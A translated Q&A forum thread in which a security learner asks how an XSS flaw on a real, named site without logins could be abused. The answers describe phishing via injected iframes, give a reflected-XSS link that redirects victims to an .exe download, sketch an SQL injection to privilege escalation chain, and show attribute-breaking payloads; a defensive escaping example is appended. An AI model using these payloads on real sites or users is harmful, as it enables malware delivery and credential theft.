How to damage a website using XSS/SQL Injection?

Viewed 5,267 times

4

I’m no kind of hacker, but I know some techniques. I’m training in security and I got really thoughtful about it. Every time I inject a script, it’s an alert(), nothing dangerous to the host (for example). I have no website, so there would be no forwarding of cookies. What is the big risk of an XSS flaw on a site without a DB/login system? I have a real site here (http://www.verinha.de/commentary_english.htm) which I found while moving around the internet. Yes, it is a potential flaw; however, as the site has no login system, I don’t know anything a black hat can do. What would real "hackers/crackers" do?

PS: To try out what I described, I wrote <script>window.location = "https://www.google.com";</script>. I was forwarded to Google and returned to the page. Nothing happened.

  • 2

    SQL Injection on a site without a DB does not exist. XSS technically exists (i.e., it may be possible to inject scripts), but attacks based on it depend on the script being persisted and run by other users of the site.

  • @bfavaretto About SQL I know, hehe. I mean, how to make appearance changes on a page, for example.

  • 3

    If you’re talking about a static website, you need server access to it.

  • In your examples you seem to me to be injecting only in your browser, and not on the site. This way you cannot reach third parties, and there is no way to make an "attack", since the actions did not even pass through the network.

  • PS: Unless you used this to target someone who would use the same PC, most likely in the same browsing session... :)

2 answers

10


There’s no single right way to exploit that. Basically you need to understand who accesses the site and what the users’ focus is, and often you use more than just one technique, for example:

Let’s assume that the users of the site in question have an account on the XPTO Site. You could create a redirect or an iframe to a fake page of the XPTO Site with a form and copy that data. Since the user entered the site with the XSS problem on their own, they will not suspect they are being fooled. Another example would be to include a redirect to an .exe for the purpose of attacking the user’s computer. This is commonly seen with bank or virtual wallet pages.

In this example the XSS is not persistent; in other words, it is not saved inside the page, and possibly there is no database. In this case the technique has to be adapted; it is common to pass the script through GET when the problem lies in some form field.

<?php
// Reflected XSS: the "nome" query parameter is echoed into the page with no output encoding.
$nome = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>

This is an example very similar to the site mentioned; the difference is that the information is passed through a PHP GET parameter and not through a JavaScript prompt(). In this case it would be enough to send users a link like

http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>

A variant of this technique was widely used at the time of Orkut. Google was already using the "Com conta Google" login by default, but there was an additional parameter called redirect, and many people sent this URL with a redirect to a .exe file or to a fake login page. I know the problem was not related to XSS, but I think it is worth mentioning.

On the website http://www.verinha.de there really is a problem with XSS, but when analyzing the source code you can see that the result is not stored anywhere, and that it is not possible to pass the value through the URL. In general there is no practical use in this case, at least not using only this technique.

I hope I’ve added something.

  • 1

    Also remember to be careful when building websites that allow images: only allow uploads, because image URLs are a potential risk. I could set the image URL to meusite.com/deletarMinhaConta.php, for example, which wouldn’t be cool.

  • What would be an attack that could actually cause a problem on a server?

  • 1

    The most common is SQL Injection, which is quite common throughout the internet. But it is possible to escalate to administrator privileges on the server using a simple upload system, or to get the login and root passwords of the server; search for RFI to understand better. In general an attack follows the following line -> SQL Injection -> Access to administrative area with upload system -> Sending infected file to server -> Privilege escalation -> Attack on all sites on the server. Of course this is one of the most common things, but each case is a different case.

-2

You’d have to think of something like this: let’s say you had a text box for typing something, such as a username:

User Name : <input ... value="Nome">

Now, if you typed something like this: "onmouseover="evento

<input ... value=" "onmouseover="evento ">

Or something like this: we have a search box, like a browser’s. If we type something, it may show "No results found for [searched word]". And if we type code, and the browser or the other site doesn’t find anything, and there is no protection, the script can run. Let’s say this is the HTML code:

<div>Não foi encntrado nenhum resultado para <script>alert("script")</script></div> 

Example 2:

<script type="text/javascript">
function Pesquise(){
/* Browser script, or the search part of a site */
/* The search term is written with innerHTML, so any markup typed into it is parsed as HTML */
document.getElementById("Result").innerHTML = "Não foi encontrado nenhum resultado para " + document.getElementById("CaixaPesquisa").value;
}
</script>

<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>

<div id="Result">

</div>
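The fix both answers leave implicit is output encoding. The following is an added example, not code from either answer: escapeHtml() is a hand-written JavaScript counterpart of PHP’s htmlspecialchars() and is applied to the same "Bem vindo $nome" template as the first answer’s PHP snippet; renderSearchResult() mirrors the second answer’s Pesquise() but writes textContent instead of innerHTML, so the typed value is never parsed as markup. FakeElement, looksInjected() and the sample values are my own constructions so the file runs under Node.js without a browser.

```javascript
// Added example (not from either answer): output encoding as the fix for the
// two reflected-XSS patterns on this page. escapeHtml() is a hand-written
// counterpart of PHP's htmlspecialchars(); renderGreeting() mirrors the
// `echo "Bem vindo $nome<br>"` snippet, and renderSearchResult() mirrors
// Pesquise() but writes textContent instead of innerHTML. FakeElement is a
// constructed stand-in for a DOM node so the file runs under Node.js.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#039;',
};

// Encode the five characters that can break out of an HTML text node or a
// quoted attribute value. Apply it at output time, in the HTML context only.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form, kept for comparison: the value lands in the markup verbatim,
// so a <script> tag (or a quote closing an attribute) becomes live HTML.
function renderGreetingUnsafe(nome) {
  return `Bem vindo ${nome}<br>`;
}

// Hardened form: same template, value encoded on the way out.
function renderGreeting(nome) {
  return `Bem vindo ${escapeHtml(nome)}<br>`;
}

// Same idea for the attribute context from the second answer: once quotes are
// encoded, a value such as "onmouseover=... cannot close the value attribute.
function renderInputValue(untrusted) {
  return `<input value="${escapeHtml(untrusted)}">`;
}

// Constructed stand-in for a DOM element. A real element parses anything
// assigned to innerHTML but keeps textContent as literal text.
class FakeElement {
  constructor() {
    this.innerHTML = '';
    this.textContent = '';
  }
}

// Hardened counterpart of Pesquise(): the query is inserted as text, never as markup.
function renderSearchResult(resultEl, query) {
  resultEl.textContent = 'Não foi encontrado nenhum resultado para ' + query;
  return resultEl.textContent;
}

// A simple check a reviewer or unit test can run over rendered output: a raw
// <script ...> start tag or an on*= handler surviving into the markup is a bug.
function looksInjected(html) {
  return /<script\b/i.test(html) || /"\s*on\w+\s*=/i.test(html);
}

// Constructed probe values resembling the ones posted on this page.
const SAMPLE_SCRIPT = '<script>alert("script")</script>';
const SAMPLE_ATTRIBUTE_BREAK = '"onmouseover="evento';

console.log('unsafe   :', renderGreetingUnsafe(SAMPLE_SCRIPT));
console.log('encoded  :', renderGreeting(SAMPLE_SCRIPT));
console.log('attribute:', renderInputValue(SAMPLE_ATTRIBUTE_BREAK));
```

The same rule carries over to the PHP snippet in the first answer: `echo "Bem vindo " . htmlspecialchars($nome, ENT_QUOTES, 'UTF-8')` produces exactly what renderGreeting() produces here. Encoding is context-specific, so this function is only correct for HTML body text and quoted attribute values; a value placed inside a JavaScript string, a URL or a CSS rule needs the encoder for that context instead.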
